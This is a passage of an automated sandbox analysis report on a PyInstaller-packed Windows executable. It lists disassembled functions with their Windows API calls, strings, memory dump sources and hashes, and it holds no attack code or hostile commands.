                                                              • API ID: Message$CurrentFormatProcess
                                                              • String ID: %ls: $<FormatMessageW failed.>$Error$[PYI-%d:ERROR]
                                                              • API String ID: 3940978338-251083826
                                                              • Opcode ID: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                              • Instruction ID: 40fc789257baf624bb4a1023497335e57fb0f40c4a91039dce3374f32279c5dc
                                                              • Opcode Fuzzy Hash: c67c27f58c2af476bbbd059d0433c12e6f67668a4e3ecf6e42cf1bc8669f0b6b
                                                              • Instruction Fuzzy Hash: 3E31E822708B4152EB20AB25BC156AA6791BF88BD8F414136EF4DE7759EF3CD706C301
                                                              Function 00007FFE133368AC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 88libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FFE13336A6B,?,?,00000000,00007FFE1333689C,?,?,?,?,00007FFE133365E5), ref: 00007FFE13336931
                                                              • GetLastError.KERNEL32(?,?,?,00007FFE13336A6B,?,?,00000000,00007FFE1333689C,?,?,?,?,00007FFE133365E5), ref: 00007FFE1333693F
                                                              • wcsncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFE13336A6B,?,?,00000000,00007FFE1333689C,?,?,?,?,00007FFE133365E5), ref: 00007FFE13336958
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FFE13336A6B,?,?,00000000,00007FFE1333689C,?,?,?,?,00007FFE133365E5), ref: 00007FFE1333696A
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FFE13336A6B,?,?,00000000,00007FFE1333689C,?,?,?,?,00007FFE133365E5), ref: 00007FFE133369B0
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FFE13336A6B,?,?,00000000,00007FFE1333689C,?,?,?,?,00007FFE133365E5), ref: 00007FFE133369BC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProcwcsncmp
                                                              • String ID: api-ms-
                                                              • API String ID: 916704608-2084034818
                                                              • Opcode ID: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
                                                              • Instruction ID: d1207f497cc00c994e77a01447c554a7d272c7598d54eaae8cd127dfe315f6bf
                                                              • Opcode Fuzzy Hash: 45bb9c456b18d615664943834e4003b355ea3ec7f5874fc1f64106649d67ca5c
                                                              • Instruction Fuzzy Hash: 37319E21B1AE429DEE159B03A9401B5E294BF24FB0F198575ED3D2B3A5EF3CE144C308
                                                              Function 00007FFE133327CC Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: abort$AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1501936508-0
                                                              • Opcode ID: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
                                                              • Instruction ID: 281c97461ad94ebf81e28756b2c20f643d49cdf6d559236144a74ce0f7cb5039
                                                              • Opcode Fuzzy Hash: ad7bbbe6b4c289a22ae1e43e79ef4439cf3ee9b14764b2eff01f06dd25f3f236
                                                              • Instruction Fuzzy Hash: BC519E21E0AE4289EA659F17D444638E394EF64FB1F09C4B5CE6DAA3A4CF2CE441C308
                                                              Function 00007FFE133325E8 Relevance: 12.1, APIs: 8, Instructions: 148COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: abort$AdjustPointer
                                                              • String ID:
                                                              • API String ID: 1501936508-0
                                                              • Opcode ID: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
                                                              • Instruction ID: d5d4dacb7f19f756d58ed72f3c2e85ab9d82fdfe881b81e531488e59f41bfb18
                                                              • Opcode Fuzzy Hash: d386002f74db6febb42ef9b4bac4e43e25a554ab645870d9c47f674d5a84533b
                                                              • Instruction Fuzzy Hash: EA51A131A0DE4289EA659F13D544638A3A0BF74FB0F06C4B5EA6DA67B5DF6CE441C308
                                                              Function 00007FFDFAFA60D2 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 227COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: Fiber$Switch$CreateDelete
                                                              • String ID: *$..\s\crypto\async\async.c
                                                              • API String ID: 2050058302-1471988776
                                                              • Opcode ID: 23a1b36eb0bbf4d08cd0e7441b32409feafa08abdd638f67e7425480b3e3102a
                                                              • Instruction ID: e713ab4f6f93d82c3ab5af6705ef3445fee9cc8576f3f1c5f19afe702c549f7c
                                                              • Opcode Fuzzy Hash: 23a1b36eb0bbf4d08cd0e7441b32409feafa08abdd638f67e7425480b3e3102a
                                                              • Instruction Fuzzy Hash: 25A1B472B0A64389EB24DF19E461AB973A1EF84B94F008131DAAD4B7E9DF3CE445D340
                                                              Function 00007FFE13335520 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 132COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: FileHeader_local_unwind
                                                              • String ID: MOC$RCC$csm$csm
                                                              • API String ID: 2627209546-1441736206
                                                              • Opcode ID: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
                                                              • Instruction ID: 7132476722da97a562677fd6ced0cd7b2b7baa8a7887fa6b6a834fced0c08e72
                                                              • Opcode Fuzzy Hash: 385ada566cdd30ad99b7ac5e1d5c8025a7264eea7c22efa234297d7bd0e399d8
                                                              • Instruction Fuzzy Hash: 73518272A09A018EFB609F27904137DB6A0FFA4F74F549171EA6C623A5DF3CE4418B05
                                                              Function 00007FFDFAFA2E4B Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 91COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: EnvironmentVariable
                                                              • String ID: OPENSSL_ia32cap$~$~$~$~
                                                              • API String ID: 1431749950-1981414212
                                                              • Opcode ID: 9eacd33310160f1931e422656a7230303f5cc1d66217712b0478dcc86fde18b9
                                                              • Instruction ID: a94a923af3e0c367c57b522909baadfcfc94261e5d9d4e4cc6824eb354f8908b
                                                              • Opcode Fuzzy Hash: 9eacd33310160f1931e422656a7230303f5cc1d66217712b0478dcc86fde18b9
                                                              • Instruction Fuzzy Hash: 57418B64F0A6538AEB10AB01E8709B463A4FF457A0F544535E96E8B7FCEF3CA4859740
                                                              Function 00007FFE1333D740 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: NameName::atol
                                                              • String ID: `template-parameter$void
                                                              • API String ID: 2130343216-4057429177
                                                              • Opcode ID: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
                                                              • Instruction ID: 5c23d7fa0fde94a43ffd5e3fe197f145fbec389dbd9bd577b3b856234cbccec0
                                                              • Opcode Fuzzy Hash: 2821a58495c29764098872c6b010649cccddcb6c42941e500fb92a9452cac6b1
                                                              • Instruction Fuzzy Hash: 0B414922F08F568CFB009BA2D8552BC63B1BB28BA4F548175DE2D2BA75DF3CA505C344
                                                              Function 00007FF623F7DCC8 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 88libraryloaderCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF623F7DF7A,?,?,?,00007FF623F7DC6C,?,?,?,00007FF623F7D869), ref: 00007FF623F7DD4D
                                                              • GetLastError.KERNEL32(?,?,?,00007FF623F7DF7A,?,?,?,00007FF623F7DC6C,?,?,?,00007FF623F7D869), ref: 00007FF623F7DD5B
                                                              • LoadLibraryExW.KERNEL32(?,?,?,00007FF623F7DF7A,?,?,?,00007FF623F7DC6C,?,?,?,00007FF623F7D869), ref: 00007FF623F7DD85
                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF623F7DF7A,?,?,?,00007FF623F7DC6C,?,?,?,00007FF623F7D869), ref: 00007FF623F7DDF3
                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF623F7DF7A,?,?,?,00007FF623F7DC6C,?,?,?,00007FF623F7D869), ref: 00007FF623F7DDFF
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Library$Load$AddressErrorFreeLastProc
                                                              • String ID: api-ms-
                                                              • API String ID: 2559590344-2084034818
                                                              • Opcode ID: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                              • Instruction ID: 63462c7f4b32f9c2acfc77c6166963b8ee76abbc26d777aee52c129115aec120
                                                              • Opcode Fuzzy Hash: 276526191d17588ee9fa22b972cdf0953455baf5c8a53fb276b347519b5968a9
                                                              • Instruction Fuzzy Hash: 3731C522B1A642D1EE129F02BC025B523D4FF48BA4F994576ED1DAB3D4EF3CE6448302
                                                              Function 00007FFE13338624 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+
                                                              • String ID: ,...$,<ellipsis>$...$<ellipsis>$void
                                                              • API String ID: 2943138195-2211150622
                                                              • Opcode ID: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
                                                              • Instruction ID: 760454afb6fc3e3eadc4b87357f33add674e580e844b26172411258557fa31cb
                                                              • Opcode Fuzzy Hash: 16d5b7056506ac1aa3be62c87a897449e0af35361c1a5b370ad614f7e7c3f2e7
                                                              • Instruction Fuzzy Hash: C1414A72A08F4A8CFB118F26D8401BC7BA0BB28B28F448175EA6D66374DF3C9549C748
                                                              Function 00007FFDFAFA377E Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 85COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1987005152.00007FFDFAFA1000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00007FFDFAFA0000, based on PE: true
                                                              • Associated: 00000001.00000002.1986977487.00007FFDFAFA0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFAFAD000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB005000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB019000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB029000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB03D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1EE000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB1F0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB21B000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB24D000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB272000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C0000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C6000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2C8000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2E5000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987005152.00007FFDFB2F2000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987760370.00007FFDFB2F6000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                              • Associated: 00000001.00000002.1987789006.00007FFDFB2F8000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                              Similarity
                                                              • API ID: 00007B5630
                                                              • String ID: MASK:$default$nombstr$pkix$utf8only
                                                              • API String ID: 2248877218-3483942737
                                                              • Opcode ID: 932e197565b87e33d4723a3e589863ca2d8ca3d862467106704a9ed93825c48c
                                                              • Instruction ID: 04948c08eb05cf1cf3464b99315a66c2f5b84ee298823f7671d6cacc09fcb734
                                                              • Opcode Fuzzy Hash: 932e197565b87e33d4723a3e589863ca2d8ca3d862467106704a9ed93825c48c
                                                              • Instruction Fuzzy Hash: 85312662F1D58386EB918B18E570BB93B90EF86790F445132EA6E476F9DE2CE590C700
                                                              Function 00007FFE1333A31C Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 83COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1995061232.00007FFE13331000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFE13330000, based on PE: true
                                                              • Associated: 00000001.00000002.1995028617.00007FFE13330000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995197161.00007FFE13341000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995254241.00007FFE13346000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000001.00000002.1995323247.00007FFE13347000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Similarity
                                                              • API ID: Name::operator+
                                                              • String ID: char $int $long $short $unsigned
                                                              • API String ID: 2943138195-3894466517
                                                              • Opcode ID: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
                                                              • Instruction ID: 0132da734bfd6f0dbfe9687183b5900ca84618999b5e7ec490e1f325955e7350
                                                              • Opcode Fuzzy Hash: 1a667bf595c3f0eddcec5e75b1b20bf055c895b242c78c01af1086ecda962d52
                                                              • Instruction Fuzzy Hash: 3D416732E18A568CFB158F6AD8441BC77B1BB28B24F448175DE2C62BB8DF3CA545C709
                                                              Function 00007FF623F72A50 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 64COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetCurrentProcessId.KERNEL32(00000000,?,?,?,00000000,00007FF623F7351A,?,00000000,00007FF623F73F1B), ref: 00007FF623F72AA0
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: CurrentProcess
                                                              • String ID: 0$WARNING$Warning$Warning [ANSI Fallback]$[PYI-%d:%s]
                                                              • API String ID: 2050909247-2900015858
                                                              • Opcode ID: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                              • Instruction ID: 8fdfac7c16d72a0986bcfbf3b3d37dbc246acf086a7355c201b30bb5bfafb7bf
                                                              • Opcode Fuzzy Hash: d3ff72078d09a899d0ca032b5bdbc8691629937d026b54217f09319e947088a3
                                                              • Instruction Fuzzy Hash: 34218E32A19B8192EB209F51BC827E66394FB887C4F404176EE8CA7659EF3CD6498741
                                                              Function 00007FF623F78570 Relevance: 10.6, APIs: 7, Instructions: 63COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Token$InformationProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                              • String ID:
                                                              • API String ID: 995526605-0
                                                              • Opcode ID: f75ab0f0843ea553283f31270fa2e47dd05c34398218a1d4d57149fb78d89f01
                                                              • Instruction ID: d15c945f620d9d08e8d175238d10b5cfb5f45fb4a9107967f80cbf4a118fe6be
                                                              • Opcode Fuzzy Hash: f75ab0f0843ea553283f31270fa2e47dd05c34398218a1d4d57149fb78d89f01
                                                              • Instruction Fuzzy Hash: 20216031A0C64642EF208F55BD4623AA3A0FF857E0F504275EA6D97BE8DF7CDA458B01
                                                              Function 00007FF623F8B150 Relevance: 10.6, APIs: 7, Instructions: 62COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: Value$ErrorLast
                                                              • String ID:
                                                              • API String ID: 2506987500-0
                                                              • Opcode ID: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                              • Instruction ID: 011e0e3c7b28f2617b294939225adf6d059f4047c531bfe4c2a902f0aad5bebd
                                                              • Opcode Fuzzy Hash: bd40692f84e3da01acd5c9e715af8932c2ff4b5b564443a413d720313231dc09
                                                              • Instruction Fuzzy Hash: AD216A20B0D74285FE6C6723BE5713952429F44BE0F0446B4D83EEBAD6EF2CAA008303
                                                              Function 00007FF623F97D6C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.1986172675.00007FF623F71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF623F70000, based on PE: true
                                                              • Associated: 00000001.00000002.1986141944.00007FF623F70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986210831.00007FF623F9B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FAE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986243456.00007FF623FB1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.1986307068.00007FF623FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Similarity
                                                              • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                              • String ID: CONOUT$
                                                              • API String ID: 3230265001-3130406586
                                                              • Opcode ID: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                              • Instruction ID: d3690d5f5adc6002b5100c9b676d0dfc04f9baa9e5b91c4c662e9b8a74fdc797
                                                              • Opcode Fuzzy Hash: 3755c2f75cb97972cd4ab37a7e27d28fd0bf6f95a56d27d10542fc75f089f0eb
                                                              • Instruction Fuzzy Hash: 1B11D021B18B4186EB608F12FC5632962A0FB88FE4F008274EA5DD77A4DF7CDA54C742
                                                              Function 00007FF623F78ED0 Relevance: 9.1, APIs: 6, Instructions: 121COMMON
                                                              Download Yara Rule
                                                              APIs
